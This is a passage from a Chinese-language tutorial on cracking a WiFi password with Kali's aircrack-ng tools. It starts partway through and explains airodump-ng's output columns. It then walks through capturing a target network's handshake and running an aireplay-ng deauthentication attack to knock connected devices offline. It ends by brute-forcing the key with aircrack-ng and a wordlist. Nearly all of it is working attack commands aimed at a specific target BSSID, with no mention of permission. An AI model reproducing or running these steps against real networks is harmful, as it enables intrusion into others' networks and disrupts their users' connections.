简单介绍一下其中的参数:
BSSID WiFi设备的MAC地址
PWR 信号水平
Beacons 数据的速率
#Date 捕获的数据分组数量
#/S 十秒内的捕获数据分组量
CH 信道号
MB 数据传输速率
ENC 加密类型
CIPHER 加密算法
AUTH 认证协议
ESSID WIFI名称
3.
使用 airodump-ng 对目标WiFi进行监听,抓包,当我们抓取他们"握手包"后可以停止监听。
命令格式: airodump-ng -c 4 --bssid <目标WIFI设备的MAC地址> -w ~/meizu wlan0mon
"~"这个为握手包存放的路径
我们将抓取到握手包命名为"meizu"(因为wifi目标为meiz名称,所以这么我们为了便于记忆就取了同一个名字)
ctrl c 停止监听
此时我们可以一直等设备连接,重新打开一个终端进行一次攻击,使连接的设备掉线,并重新连接,从而获取握手包。 命令如下:
aireplay-ng -0 0 -a 92:F0:52:E5:37:98 wlan0mon
中间的十六进制数字为目标mac地址,也就是bssid
ctrl z攻击
此时我们再看一下上一个终端,发现握手包就表示抓包成功
4.接下来就是使用密码字典了
kali系统自带有字典库,路径为 /usr/share/sqlmap/txt/wordlist.txt
下面我们使用命令
aircrack-ng -w /usr/share/sqlmap/txt/wordlist.txt ~/MeiZu-01.cap
-w 字典路径 握手包路径
我们可以使用命令 ls 查看一下我们抓取到都是什么数据